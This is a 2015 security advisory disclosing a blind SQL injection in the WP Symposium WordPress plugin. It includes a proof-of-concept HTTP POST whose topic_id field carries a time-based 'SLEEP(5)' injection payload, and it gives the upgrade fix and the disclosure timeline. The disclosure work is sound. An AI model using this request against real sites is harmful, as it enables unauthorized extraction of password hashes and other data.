Software: WP Symposium
Advisory report: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
CVE: Awaiting assignment
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:P)
Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data
An unauthenticated user can run blind sql injection of the site and extract password hashes and other information from the database.
Proof of concept
Perform the following POST to a site with the plugin installed. The request will take over 5 seconds to respond:
POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320
action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0
Upgrade to version 15.8 or later
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on firstname.lastname@example.org to acknowledge this report if you received it via a third party (for example, email@example.com) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
2015-07-14: Reported to firstname.lastname@example.org
2015-07-14: Requested CVE
2015-08-07: Vendor confirmed fixed in version 15.8
Discovered by dxw:
Please visit security.dxw.com for more information.